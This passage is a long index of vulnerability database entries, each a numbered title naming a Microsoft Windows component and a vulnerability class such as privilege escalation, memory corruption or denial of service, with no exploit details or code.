LSASS.EXE privilege escalation [13873] Microsoft Windows 4.0 SMB Mount denial of service [13871] Microsoft Windows NT 4.0 Winpopup denial of service [13856] Microsoft Windows NT 4.0 RPC Locator rpcss.exe denial of service [13834] Microsoft Windows NT 4.0/2000 Account Policy weak authentication [13833] Microsoft Windows NT 4.0 File Audit Policy privilege escalation [13832] Microsoft Windows NT 4.0 Audit Policy privilege escalation [13831] Microsoft Windows NT 4.0/2000 REG Files privilege escalation [13830] Microsoft Windows NT 4.0/2000 Registry privilege escalation [13828] Microsoft Windows NT 4.0/2000 Account Policy privilege escalation [13826] Microsoft Windows Traceroute privilege escalation [13824] Microsoft Windows 95/NT 4.0/2000 NetBIOS/SMB Share weak authentication [13823] Microsoft Windows 95 NetBIOS/SMB Share weak authentication [13821] Microsoft Windows NT 4.0/2000 IP Forwarding privilege escalation [13819] Microsoft Windows NT 4.0/2000 Password Authentication weak authentication [13817] Microsoft Windows NT 4.0/2000 SNMP Registry Key information disclosure [13815] Microsoft Windows 95/NT 4.0 ICMP Jolt denial of service [13814] Microsoft Windows NT 4.0 DNS Server denial of service [13802] Microsoft Windows 95/NT 3.51 Samba Share Code [13695] Microsoft Windows NT 4.0 TCP Sequence Number weak authentication [13549] Microsoft Windows 7/8/8.1/Server 2012 Remote Desktop Protocol weak encryption [13548] Microsoft Windows up to Vista TCP/IP Packet privilege escalation [13546] Microsoft Windows up to Vista XML Core Services privilege escalation [13544] Microsoft Windows up to Vista GDI+ privilege escalation [13543] Microsoft Windows up to Vista Unicode Script Processor usp10.dll memory corruption [13397] Microsoft Windows 2000/Server 2003/XP DHCP Response weak authentication [13234] Microsoft Windows iSCSI Packets privilege escalation [13233] Microsoft Windows iSCSI Packets privilege escalation [12853] Microsoft Windows up to XP SP3 Batch File CreateProcess privilege escalation [12711] Microsoft Windows Media Player 11.0.5721.5230 WAV File memory corruption [12530] Microsoft Windows Server 2003/Server 2008/Server 2012/Vista/XP Security Account Manager privilege escalation [12526] Microsoft Windows up to XP DirectShow denial of service [12264] Microsoft Windows up to XP XML Core Services privilege escalation [12263] Microsoft Windows up to Server 2012 Direct2D memory corruption [12238] Microsoft Windows 8/RT/Server 2012 IPv6 privilege escalation [11673] Microsoft Windows Live Movie Maker 2011 WAV File privilege escalation [11456] Microsoft Windows up to XP Scripting Runtime Object Library denial of service [11167] Microsoft Windows up to XP DirectAcccess Server privilege escalation [11150] Microsoft Windows 8/Server 2012 Hyper-V Data Structure Value privilege escalation [11147] Microsoft Windows up to XP X.509 Certificate Processor Crypt32.dll/Wcrypt32.dll privilege escalation [11145] Microsoft Windows up to XP Graphics Device Interface Numeric Error [11081] Microsoft Windows Server 2008/Vista TIFF Image privilege escalation [11004] Microsoft Windows Server 2012 R2 RDP Restricted Admin Mode weak authentication [10641] Microsoft Windows up to XP Comctl32.dll DSA_InsertItem denial of service [10638] Microsoft Windows up to XP TrueType Font privilege escalation [10632] Microsoft Windows up to XP OpenType Font privilege escalation [10192] Microsoft Windows 7/2000/Server 2003 SP2/Vista/XP SP3 Windows Theme File privilege escalation [10191] Microsoft Windows Server 2003/XP OLE Object memory corruption [10190] Microsoft Windows 7/8/Server 2008/Vista Active Directory privilege escalation [9944] Microsoft Windows up to XP TCP/IP Stack memory corruption [9943] Microsoft Windows Server 2012 NAT Driver memory corruption [9942] Microsoft Windows up to XP Asynchronous RPC Request privilege escalation [9941] Microsoft Windows Server 2003/XP Unicode Scripts Processor USP10.DLL memory corruption [9929] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services information disclosure [9423] Microsoft Windows Microsoft WMV Codec privilege escalation [9422] Microsoft Windows GIF DirectShow privilege escalation [9398] Microsoft Windows up to XP TTF privilege escalation [9103] Microsoft Windows TCP/IP Driver Numeric Error [8739] Microsoft Windows Essentials up to 2012 Windows Writer privilege escalation [8722] Microsoft Windows 8/RT/Server 2012 HTTP.sys memory corruption [8208] Microsoft Windows win32k.sys privilege escalation [8207] Microsoft Windows win32k.sys race condition [8203] Microsoft Windows up to 2012 AD LDAP Query privilege escalation [8095] Microsoft Windows Modern Mail weak authentication [7996] Microsoft Windows 8 TrueType Font denial of service [7680] Microsoft Windows XP SP3 Object Linking/Embedding denial of service [7678] Microsoft Windows up to XP TCP FIN WAIT TCP/IP denial of service [7644] Microsoft Windows up to XP .NET Framework callback privilege escalation [7643] Microsoft Windows Server 2008 R2/Server 2012 NFS Server denial of service [7641] Microsoft Windows Server 2003/Server 2008/Vista/XP DirectShow Quartz.dll privilege escalation [7258] Microsoft Windows up to 8/Server 2012 SSL/TLS privilege escalation [7248] Microsoft Windows 7/Server 2008 R2 Print Spooler memory corruption [7233] Microsoft Windows up to XP SP3 TURKTRUST Certificate weak authentication [7128] Microsoft Windows up to XP Font Parser privilege escalation [7123] Microsoft Windows up to XP Font Parser privilege escalation [7118] Microsoft Windows Server 2008 R2/Server 2012 IP-HTTPS privilege escalation [7058] Microsoft Windows 7/Server 2008 R2 DHCPv6 Message denial of service [6932] Microsoft Windows up to XP win32k.sys denial of service [6931] Microsoft Windows up to XP win32k.sys denial of service [6923] Microsoft Windows up to XP Briefcase Numeric Error [6922] Microsoft Windows up to XP Briefcase denial of service [6525] Microsoft Windows Phone 7 Certificate Subject Common Name weak encryption [6029] Microsoft Windows up to XP MS-CHAP V2 Authentication weak encryption [5942] Microsoft Windows XP Remote Desktop Protocol memory corruption [5941] Microsoft Windows XP Remote Administration Protocol memory corruption [5940] Microsoft Windows XP Remote Administration Protocol memory corruption [5939] Microsoft Windows 7/Server 2003/Server 2008 R2/Vista/XP Print Spooler Service Format String [5938] Microsoft Windows 7/Server 2003/Server 2008 R2/Vista/XP Remote Administration Protocol netapi32.dll privilege escalation [5663] Microsoft Windows 7/Vista Gadgets memory corruption [5654] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP information disclosure [5653] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP win32k.sys privilege escalation [5652] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP win32k.sys privilege escalation [5650] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP privilege escalation [5553] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP OpenType Font atmfd.dll denial of service [5524] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP privilege escalation [5361] Microsoft Windows privilege escalation [5359] Microsoft Windows XP t2embed.dll denial of service [5358] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP TrueType Font Handling memory corruption [5046] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Windows Authenticode Signature Verification privilege escalation [4803] Microsoft Windows Server 2003/Server 2008 DNS Server Domain Resource Record Query Parser denial of service [4802] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Remote Desktop Protocol privilege escalation [4798] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Remote Desktop Service privilege escalation [4546] Microsoft Windows NT Ntdll.dll unknown vulnerability [4535] Microsoft Windows Server 2003/XP Object Packager packager.exe privilege escalation [4534] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Line21 DirectShow Filter Quartz.dll/Qdvd.dll memory corruption [4533] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Multimedia Library winmm.dll memory corruption [4532] Microsoft Windows Embedded ClickOnce Application memory corruption [4484] Microsoft Windows Phone 7.5 SMS Service weak encryption [4481] Microsoft Windows Media Player ENCDEC.DLL privilege escalation [4478] Microsoft Windows Server 2003/XP OLE Objects Memory Management privilege escalation [4474] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Active Directory Query memory corruption [4458] Microsoft Windows Apple Safari win32k.sys privilege escalation [4455] Microsoft Windows XP Keyboard Layout win32k.sys denial of service [4452] Microsoft Windows Adctive Directory Query memory corruption [4451] Microsoft Windows Kernel Exception privilege escalation [4450] Microsoft Windows OLE Objects Property privilege escalation [4449] Microsoft Windows CSRSS Device Event Message privilege escalation [4448] Microsoft Windows 7/Vista/XP Media DVR-MS Parser privilege escalation [4447] Microsoft Windows Time ActiveX Control privilege escalation [4440] Microsoft Windows Active Directory weak authentication [4439] Microsoft Windows True Type Fonts privilege escalation [4438] Microsoft Windows 7/Server 2008/Vista TCP/IP Reference Counter Numeric Error [4436] Microsoft Windows True Type Fonts win32k.sys memory corruption [4431] Microsoft Windows SSL/TLS IV privilege escalation [4422] Microsoft Windows Driver win32k.sys memory corruption [4421] Microsoft Windows Ancillary Function Driver privilege escalation [4410] Microsoft Windows Library Loader privilege escalation [4409] Microsoft Windows Server 2003/Server 2008 WINS privilege escalation [4396] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack denial of service [4395] Microsoft Windows Client/Server Run-Time Subsystem privilege escalation [4394] Microsoft Windows DNS Service Domain Lookup memory corruption [4393] Microsoft Windows Server 2008 DNS Service privilege escalation [4392] Microsoft Windows Remote Access Service privilege escalation [4390] Microsoft Windows Server 2008 Remote Desktop Web Access cross site scripting [4389] Microsoft Windows Remote Desktop Protocol denial of service [4388] Microsoft Windows 7/Server 2008/Vista File Metadata Parser denial of service [4386] Microsoft Windows XP denial of service [4382] Microsoft Windows CSRSS memory corruption [4381] Microsoft Windows 7/Vista Bluetooth Driver Object privilege escalation [4380] Microsoft Windows Driver win32k.sys denial of service [4373] Microsoft Windows MHTML cross site scripting [4371] Microsoft Windows Distributed File System memory corruption [4367] Microsoft Windows Server 2008 Hyper-V VMBus denial of service [4366] Microsoft Windows OLE Automatisation Numeric Error [4365] Microsoft Windows OpenType Font privilege escalation [4364] Microsoft Windows Active Directory cross site scripting [4363] Microsoft Windows SMB Client privilege escalation [4362] Microsoft Windows 7/Server 2008/Vista denial of service [4361] Microsoft Windows Ancillary Function Driver privilege escalation [4347] Microsoft Windows WINS Service privilege escalation [4339] Microsoft Windows JScript/VBScript Numeric Error [4338] Microsoft Windows DNS privilege escalation [4337] Microsoft Windows OpenType Font memory corruption [4336] Microsoft Windows Driver win32k.sys denial of service [4335] Microsoft Windows GDI+ Numeric Error [4333] Microsoft Windows Wordpad privilege escalation [4331] Microsoft Windows SMB Transaction Parser privilege escalation [4314] Microsoft Windows DirectShow/Windows Media privilege escalation [4313] Microsoft Windows Remote Desktop Client privilege escalation [4301] Microsoft Windows Server 2003 SMB Browser memory corruption [4298] Microsoft Windows 7/Server 2008 JScript/VBScript Engine information disclosure [4297] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP OpenType Compact Font Format Driver privilege escalation [4296] Microsoft Windows Server 2003/XP LSASS weak authentication [4294] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Driver win32k.sys privilege escalation [4292] Microsoft Windows Server 2003/XP CSRSS Logoff privilege escalation [4279] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP MHTML cross site scripting [4238] Microsoft Windows Data Access Components Numeric Error [4237] Microsoft Windows Thumbnail Bitmap Parser memory corruption [4235] Microsoft Windows Fax Cover Page Editor memory corruption [4233] Microsoft Windows privilege escalation [4231] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Driver win32k.sys GreEnableEUDC memory corruption [4228] Microsoft Windows Server 2008 Hyper-V VMBus privilege escalation [4227] Microsoft Windows Netlogon RPC Service denial of service [4226] Microsoft Windows OpenType Font Driver privilege escalation [4225] Microsoft Windows Routing/Remote Access NDProxy memory corruption [4224] Microsoft Windows 7/Server 2008/Vista Consent User Interface privilege escalation [4207] Microsoft Windows Keyboard Layout win32k.sys memory corruption [4204] Microsoft Windows Server 2008 Color Control Panel unknown vulnerability [4202] Microsoft Windows Keyboard Layout win32k.sys Windows Class privilege escalation [4201] Microsoft Windows OpenType Font Parser Numeric Error [4198] Microsoft Windows Shell/Wordpad privilege escalation [4195] Microsoft Windows Integer Truncation Common Control Library memory corruption [4194] Microsoft Windows 7/Server 2008/Vista SChannel Client privilege escalation [4193] Microsoft Windows OpenType Font Parser privilege escalation [4192] Microsoft Windows LPC Message memory corruption [4187] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack Ipv4SetEchoRequestCreate denial of service [4185] Microsoft Windows Client/Server Run-Time Subsystem privilege escalation [4184] Microsoft Windows LSASS memory corruption [4183] Microsoft Windows Unicode Script Processor privilege escalation [4182] Microsoft Windows MPEG-4 Codec Content Parser privilege escalation [4181] Microsoft Windows RPC Processor privilege escalation [4166] Microsoft Windows SMB Server privilege escalation [4165] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack memory corruption [4162] Microsoft Windows 7/Server 2008/Vista Kernel race condition [4161] Microsoft Windows TLS/SSL Session weak encryption [4158] Microsoft Windows Driver win32k.sys CreateDIBPalette memory corruption [4152] Microsoft Windows MFC Document Title Updating memory corruption [4151] Microsoft Windows Server 2008/Vista NtUserCheckAccessForIntegrityLevel denial of service [4149] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Shell Shortcut Parser privilege escalation [4139] Microsoft Windows Help/Support Center privilege escalation [4136] Microsoft Windows Media Decompression privilege escalation [4135] Microsoft Windows Kernel Mode Driver privilege escalation [4134] Microsoft Windows OpenType Compact Font Format Driver privilege escalation [4126] Microsoft Windows Mail STAT Numeric Error [4107] Microsoft Windows 7/Server 2008 Kernel privilege escalation [4105] Microsoft Windows SMB Client denial of service [4104] Microsoft Windows SMTP Service privilege escalation [4103] Microsoft Windows Server 2003 Media Services memory corruption [4102] Microsoft Windows Authentication Verification privilege escalation [4101] Microsoft Windows ISATAP privilege escalation [4100] Microsoft Windows MPEG Layer-3 Codec memory corruption [4089] Microsoft Windows Movie Maker memory corruption [4088] Microsoft Windows HLP File MsgBox privilege escalation [4087] Microsoft Windows DirectShow memory corruption [4086] Microsoft Windows CSRSS privilege escalation [4085] Microsoft Windows SMB Client privilege escalation [4084] Microsoft Windows Shell privilege escalation [4083] Microsoft Windows Paint Numeric Error [4076] Microsoft Windows Embedded OpenType Font Engine Numeric Error [4070] Microsoft Windows Indeo Codec memory corruption [4068] Microsoft Windows MS-CHAP Authentication privilege escalation [4067] Microsoft Windows Active Directory Federation Service privilege escalation [4066] Microsoft Windows Local Security Authority Subsystem denial of service [4060] Microsoft Windows Win32k Kernel Mode Driver privilege escalation [4058] Microsoft Windows Active Directory denial of service [4051] Microsoft Windows GDI+ privilege escalation [4050] Microsoft Windows ActiveX Control memory corruption [4049] Microsoft Windows ActiveX Controls ATL OleLoadFromStream privilege escalation [4044] Microsoft Windows Media Runtime privilege escalation [4031] Microsoft Windows Server 2008/Vista SMB Processor EducatedScholar denial of service [4030] Microsoft Windows Server 2008/Vista Wireless LAN AutoConfig Service memory corruption [4029] Microsoft Windows 2000/XP TCP/IP Window Size denial of service [4028] Microsoft Windows ASF/MP3 Media privilege escalation [4026] Microsoft Windows DHTML Editing ActiveX Control privilege escalation [4025] Microsoft Windows privilege escalation [4016] Microsoft Windows Remote Desktop Connection memory corruption [4014] Microsoft Windows Workstation Service denial of service [4013] Microsoft Windows Message Queuing Service privilege escalation [4012] Microsoft Windows WINS Service Numeric Error [4011] Microsoft Windows WINS Service memory corruption [4010] Microsoft Windows AVI Movie privilege escalation [4001] Microsoft Windows DirectShow memory corruption [3998] Microsoft Windows Embedded OpenType Font Engine memory corruption [3997] Microsoft Windows Embedded OpenType Font Engine Numeric Error [3990] Microsoft Windows Print Spooler memory corruption [3989] Microsoft Windows Print Spooler memory corruption [3988] Microsoft Windows Print Spooler EnumeratePrintShares memory corruption [3979] Microsoft Windows DirectShow memory corruption [3960] Microsoft Windows 2000/Server 2003/XP DirectShow MJPEG privilege escalation [3950] Microsoft Windows HTTP Service Numeric Error [3939] Microsoft Windows 2000 DNS privilege escalation [3938] Microsoft Windows 2000 SSL weak authentication [3937] Microsoft Windows 2000 privilege escalation [3895] Microsoft Windows GDI Image Parser memory corruption [3894] Microsoft Windows GDI Image Parser Numeric Error [3893] Microsoft Windows WordPad denial of service [3866] Microsoft Windows SMB Authentication weak authentication [3860] Microsoft Windows Path Canonicalisation EclipsedWing privilege escalation [3853] Microsoft Windows Ancillary Function Driver privilege escalation [3852] Microsoft Windows SMB memory corruption [3851] Microsoft Windows IIS IPP Service Numeric Error [3850] Microsoft Windows privilege escalation [3849] Microsoft Windows denial of service [3846] Microsoft Windows privilege escalation [3845] Microsoft Windows 2000 SP4 Active Directory denial of service [3822] Microsoft Windows GDI+ BMP Image Numeric Error [3821] Microsoft Windows GDI+ WMF File Numeric Error [3820] Microsoft Windows GDI+ GIF Image Numeric Error [3819] Microsoft Windows GDI+ EMF File Numeric Error [3818] Microsoft Windows GDI+ Numeric Error [3812] Microsoft Windows Vista Bitlocker Password Output information disclosure [3806] Microsoft Windows Color Management memory corruption [3797] Microsoft Windows Server 2008/Vista IPsec Policy information disclosure [3777] Microsoft Windows Server 2008/Vista SP1 Explorer privilege escalation [3733] Microsoft Windows Active Directory privilege escalation [3732] Microsoft Windows 2000/Server 2003 WINS privilege escalation [3730] Microsoft Windows Vista/XP privilege escalation [3699] Microsoft Windows CE Image privilege escalation [3686] Microsoft Windows privilege escalation [3675] Microsoft Windows Kernel privilege escalation [3674] Microsoft Windows ActiveX Control hxvz.dll privilege escalation [3673] Microsoft Windows memory corruption [3672] Microsoft Windows GDI WMF Color Depth memory corruption [3603] Microsoft Windows NT 4.0/2000/XP/Vista OLE Automation privilege escalation [3542] Microsoft Windows LSASS privilege escalation [3541] Microsoft Windows ICMP Fragmentation memory corruption [3540] Microsoft Windows IGMPv3/MLDv2 memory corruption [3505] Microsoft Windows Vista Kernel Legacy Reply Path Validator privilege escalation [3504] Microsoft Windows Message Queue memory corruption [3500] Microsoft Windows Vista SMBv2 Signing privilege escalation [3372] Microsoft Windows SharePoint Services cross site scripting [3370] Microsoft Windows RPC Authentication denial of service [3368] Microsoft Windows up to Vista NNTP Response memory corruption [3367] Microsoft Windows Kodak Image Viewer privilege escalation [3302] Microsoft Windows Services for UNIX privilege escalation [3253] Microsoft Windows OLE Automation substringData memory corruption [3242] Microsoft Windows VML Vector Markup Language memory corruption [3223] Microsoft Windows Server 2003/XP URI privilege escalation [3179] Microsoft Windows Active Directory denial of service [3178] Microsoft Windows Active Directory memory corruption [3177] Microsoft Windows Vista Firewall Teredo unknown vulnerability [3128] Microsoft Windows Win32 API memory corruption [3012] Microsoft Windows 2000/Server 2003 DNS Service memory corruption [3005] Microsoft Windows XP memory corruption [3004] Microsoft Windows up to 2003/XP URL Parser memory corruption [2991] Microsoft Windows Vista ATI Radeon Kernel Mode Driver denial of service [2990] Microsoft Windows 2000/Vista/XP Animated Cursor memory corruption [2933] Microsoft Windows 2000 SP4/Server 2003 SP1/XP SP2 OLE Dialog privilege escalation [2932] Microsoft Windows Malware Protection Engine Integer Coercion Error [2925] Microsoft Windows HTML Help ActiveX Control memory corruption [2811] Microsoft Windows 2000/Server 2003/XP VML Vector Markup Language Integer Coercion Error [2789] Microsoft Windows 2000/XP RPC Request NetrWkstaUserEnum denial of service [2788] Microsoft Windows up to Vista CSRSS WINSRV.DLL MessageBox memory corruption [2739] Microsoft Windows 2000 Remote Installation Service unknown vulnerability [2738] Microsoft Windows 2000/Server 2003/XP SNMP memory corruption [2737] Microsoft Windows Server 2003/XP Manifest privilege escalation [2724] Microsoft Windows up to 10 Media Player memory corruption [2717] Microsoft Windows 2000 Print Spooler denial of service [2689] Microsoft Windows up to 2000 SP4 Active Directory denial of service [2688] Microsoft Windows 2000/Server 2003/XP Client Service for Netware denial of service [2687] Microsoft Windows 2000/Server 2003/XP Agent ActiveX Numeric Error [2686] Microsoft Windows 2000/Server 2003/XP Client Service for Netware memory corruption [2684] Microsoft Windows 2000/XP Workstation Service memory corruption [2659] Microsoft Windows 2000/XP GDI memory corruption [2655] Microsoft Windows 2000/Server 2003/XP XML Core Services memory corruption [2640] Microsoft Windows XP Windows NAT Helper Component ipnathlp.dll denial of service [2601] Microsoft Windows Server 2003/XP IPv6 Stack denial of service [2600] Microsoft Windows Server 2003/XP IPv6 Stack TCP weak encryption [2599] Microsoft Windows Server 2003/XP IPv6 Stack ICMP weak encryption [2598] Microsoft Windows Server 2003/XP Object Packager privilege escalation [2522] Microsoft Windows 2000/Server 2003/XP Indexing Service cross site scripting [2520] Microsoft Windows XP Pragmatic General Multicast privilege escalation [2436] Microsoft Windows 2000/Server 2003/XP Kernel memory corruption [2435] Microsoft Windows 2000/Server 2003/XP Exception memory corruption [2434] Microsoft Windows 2000/Server 2003/XP Winlogon privilege escalation [2433] Microsoft Windows 2000 Management Console cross site scripting [2432] Microsoft Windows 2000/Server 2003/XP DNS Resolver memory corruption [2431] Microsoft Windows 2000/Server 2003/XP Winsock API memory corruption [2430] Microsoft Windows 2000/Server 2003/XP RPC ELV memory corruption [2426] Microsoft Windows 2000/Server 2003/XP WMF File gdi32.dll denial of service [2415] Microsoft Windows 2000/Server 2003/XP SMB File srv.sys privilege escalation [2370] Microsoft Windows 2000/Server 2003/XP Server Protocol Driver memory corruption [2369] Microsoft Windows 2000/Server 2003/XP Server Service Mailslot memory corruption [2366] Microsoft Windows 2000/Server 2003/XP DHCP Client memory corruption [2311] Microsoft Windows 2000/Server 2003/XP MRXSMB.SYS MRxSmbCscIoctlOpenForCopyChunk privilege escalation [2310] Microsoft Windows 2000 RPC weak authentication [2309] Microsoft Windows 2000/Server 2003/XP Routing/Remote Access Service memory corruption [2307] Microsoft Windows 2000/Server 2003/XP JScript Object memory corruption [2306] Microsoft Windows 2000/Server 2003/XP IP Source Routing memory corruption [2305] Microsoft Windows Server 2003/XP ART Image memory corruption [2295] Microsoft Windows 9/10 Media Player memory corruption [2275] Microsoft Windows Server 2003/XP mhtml URI inetcomm.dll memory corruption [2221] Microsoft Windows 2000/XP CHM Archive itss.dll memory corruption [2218] Microsoft Windows 2000/Server 2003/XP MSDTC memory corruption [2147] Microsoft Windows 2000/Server 2003/XP COM Object memory corruption [2054] Microsoft Windows up to 10 Media Player memory corruption [2051] Microsoft Windows Server 2003/XP Web Client Service memory corruption [2050] Microsoft Windows Server 2003/XP TCP/IP IGMP memory corruption [2049] Microsoft Windows 2000/Server 2003/XP Media Player memory corruption [2036] Microsoft Windows Server 2003/XP Service privilege escalation [1962] Microsoft Windows 2000/Server 2003/XP Web Fonts memory corruption [1934] Microsoft Windows Server 2003/XP WMF File privilege escalation [1917] Microsoft Windows NT 4.0/2000 unknown vulnerability [1909] Microsoft Windows up to XP SP1 UPnP GetDeviceList denial of service [1876] Microsoft Windows 2000/XP WMF/EMF File Integer Coercion Error [1801] Microsoft Windows 2000/Server 2003/XP Client Service for Netware memory corruption [1798] Microsoft Windows 2000/Server 2003/XP Transaction Internet Protocol denial of service [1797] Microsoft Windows 2000/Server 2003/XP COM+ memory corruption [1796] Microsoft Windows 2000/Server 2003/XP Distributed Transaction Coordinator memory corruption [1793] Microsoft Windows 2000/Server 2003/XP Explorer HTML Preview cross site scripting [1792] Microsoft Windows 2000/Server 2003/XP lnk File memory corruption [1791] Microsoft Windows 2000/Server 2003/XP lnk File memory corruption [1789] Microsoft Windows 2000/Server 2003/XP Plug-and-Play Service memory corruption [1781] Microsoft Windows XP Wireless Zero Configuration WZCQueryInterface unknown vulnerability [1726] Microsoft Windows XP SP2 unknown vulnerability [1692] Microsoft Windows up to Server 2003 Print Spooler memory corruption [1689] Microsoft Windows up to Server 2003 Plug-and-Play Service memory corruption [1687] Microsoft Windows up to XP Telephony Application Programming Interface memory corruption [1653] Microsoft Windows up to XP USB Driver memory corruption [1623] Microsoft Windows 2000/XP Network Connectivity netman.dll denial of service [1621] Microsoft Windows up to XP SP2 Kernel denial of service [1596] Microsoft Windows 95/98/2000/Server 2003/XP Color Management memory corruption [1570] Microsoft Windows 2000/Server 2003/XP SMB memory corruption [1569] Microsoft Windows Server 2003/XP Web Client Service memory corruption [1568] Microsoft Windows 2000/Server 2003/XP Agent Internet Content cross site scripting [1567] Microsoft Windows 2000/Server 2003/XP HTML Help Input memory corruption [1547] Microsoft Windows 2000/Server 2003/XP Remote Desktop mstlsapi.dll weak authentication [1411] Microsoft Windows up to XP SP2 Image denial of service [1407] Microsoft Windows 2000 Web View webvw.dll memory corruption [1358] Microsoft Windows 2000/Server 2003/XP CSRSS memory corruption [1357] Microsoft Windows 2000/Server 2003/XP Objekt Manager memory corruption [1356] Microsoft Windows 2000/Server 2003/XP Kernel Access memory corruption [1355] Microsoft Windows 2000/Server 2003/XP Font File memory corruption [1350] Microsoft Windows 2000/Server 2003/XP Shell MSHTA.EXE memory corruption [1349] Microsoft Windows 2000/XP SP1 RPC Message Queue memory corruption [1328] Microsoft Windows Server 2003 Print Color Adjustment denial of service [1327] Microsoft Windows Server 2003 SMB denial of service [1291] Microsoft Windows 2000 EMF File GetEnhMetaFilePaletteEntries denial of service [1268] Microsoft Windows Server 2003/XP TCP/IP Stack denial of service [1196] Microsoft Windows up to XP/Server 2003 Drag / Drop memory corruption [1195] Microsoft Windows 98/2000/ME/XP OLE File memory corruption [1194] Microsoft Windows/Office up to XP COM File unknown vulnerability [1193] Microsoft Windows NT 4.0/2000/Server 2003 License Logging Server privilege escalation [1191] Microsoft Windows XP Hyperlink Object Library memory corruption [1190] Microsoft Windows XP Named Pipe Connection memory corruption [1189] Microsoft Windows 2000/Server 2003/XP SMB memory corruption [1107] Microsoft Windows Server 2003/XP Indexing Service memory corruption [1088] Microsoft Windows up to XP SP2 HLP File winhlp32.exe memory corruption [1087] Microsoft Windows up to XP SP2 ANI File memory corruption [1086] Microsoft Windows up to XP SP2 LoadImage API memory corruption [1076] Microsoft Windows 9 Media Player setItemInfo privilege escalation [1075] Microsoft Windows 9 Media Player getItemInfoByAtom information disclosure [1070] Microsoft Windows XP SP2 privilege escalation [1042] Microsoft Windows up to Server 2003 HyperTerminal URL memory corruption [1041] Microsoft Windows up to XP WINS Name Validator memory corruption [1040] Microsoft Windows up to XP Local Security Authority Subsystem Service memory corruption [1039] Microsoft Windows up to XP Local Procedure Call memory corruption [1038] Microsoft Windows up to XP WordPad Word for Windows 6.0 Converter memory corruption [1037] Microsoft Windows NT 4.0 DHCP Service memory corruption [1036] Microsoft Windows NT 4.0 Server memory corruption [1011] Microsoft Windows WINS memory corruption [937] Microsoft Windows XP WAV Media File denial of service [909] Microsoft Windows NT 4.0/2000/XP ASCII Editor unknown vulnerability [908] Microsoft Windows XP JPEG ActiveX Image Control asycpict.dll denial of service [900] Microsoft Windows grpconv.exe memory corruption [899] Microsoft Windows memory corruption [898] Microsoft Windows XP on 64-bit SMTP DNS Reply memory corruption [897] Microsoft Windows Server 2003/XP ZIP Archive dunzip32.dll memory corruption [891] Microsoft Windows memory corruption [890] Microsoft Windows denial of service [889] Microsoft Windows memory corruption [888] Microsoft Windows privilege escalation [886] Microsoft Windows denial of service [885] Microsoft Windows 2000/Server 2003/XP WebDAV XML Message denial of service [884] Microsoft Windows NT 4.0 RPC Runtime Library denial of service [883] Microsoft Windows NT 4.0/2000/Server 2003 memory corruption [862] Microsoft Windows 2000/XP SYSTEM32 memory corruption [860] Microsoft Windows 2000/XP Packet Fragmentation denial of service [833] Microsoft Windows memory corruption [792] Microsoft Windows up to XP SP2 Internet Download cmd.exe unknown vulnerability [765] Microsoft Windows memory corruption [764] Microsoft Windows NT 4.0/2000/XP Task Scheduler containing memory corruption [763] Microsoft Windows NT 4.0/2000 POSIX Subsystem memory corruption [761] Microsoft Windows 2000 Utility Manager winhlp32.exe memory corruption [683] Microsoft Windows 2000 weak authentication [664] Microsoft Windows 2000/XP CLSID desktop.ini memory corruption [655] Microsoft Windows FTPD Sasser Worm memory corruption [637] Microsoft Windows NetBIOS Share Name memory corruption [618] Microsoft Windows Server 2003 MS04-011 Patch unknown vulnerability [610] Microsoft Windows up to XP/Server 2003 ASN.1 Library memory corruption [609] Microsoft Windows 2000/Server 2003/XP Negotiate Security Software Provider memory corruption [608] Microsoft Windows NT 4.0/2000 Virtual DOS Machine denial of service [607] Microsoft Windows NT 4.0/2000/XP Local Descriptor Table privilege escalation [606] Microsoft Windows XP Taskmanager memory corruption [605] Microsoft Windows 2000 Utility Manager memory corruption [604] Microsoft Windows Server 2003/XP Help/Support Center memory corruption [603] Microsoft Windows 2000 Metafile WMF/EMF Integer Coercion Error [602] Microsoft Windows NT 4.0/2000/XP WinLogon Domain Object memory corruption [601] Microsoft Windows up to XP/Server 2003 PCT Message memory corruption [600] Microsoft Windows 2000 Domain Controller memory corruption [599] Microsoft Windows up to Server 2003 LSASS Request memory corruption [598] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC/DCOM Object Identity unknown vulnerability [597] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC over HTTP Reply denial of service [596] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPCSS denial of service [564] Microsoft Windows XP on WinXP WMF File explorer.exe denial of service [530] Microsoft Windows XP EMF File shimgvw.dll Integer Coercion Error [518] Microsoft Windows Server 2003/XP ntdll.dll unknown vulnerability [516] Microsoft Windows up to XP SP1 BMP Image imgbmp.cxx memory corruption [509] Microsoft Windows NT 4.0/2000/XP/Server 2003 WINS Server GS privilege escalation [508] Microsoft Windows NT 4.0/2000/XP/Server 2003 ASN.1 lsass.exe Integer Coercion Error [491] Microsoft Windows XP .folder memory corruption [441] Microsoft Windows SHELL32.DLL memory corruption [414] Microsoft Windows XP BIOS Date Reset denial of service [383] Microsoft Windows 2000/XP Workstation Service memory corruption [350] Microsoft Windows 2000/NT/Server 2003/XP HTML Help memory corruption [348] Microsoft Windows XP CommCtl32.dll memory corruption [332] Microsoft Windows NT 4.0/2000/XP Messenger Service memory corruption [331] Microsoft Windows 2000/XP RPCSS race condition [328] Microsoft Windows 2000 Message Queuing Service mqsvc.exe memory corruption [323] Microsoft Windows Server 2003 Shell Folder information disclosure [318] Microsoft Windows Media Player 6.4/7/7.1/9 unknown vulnerability [312] Microsoft Windows 2000/Server 2003/Vista/XP 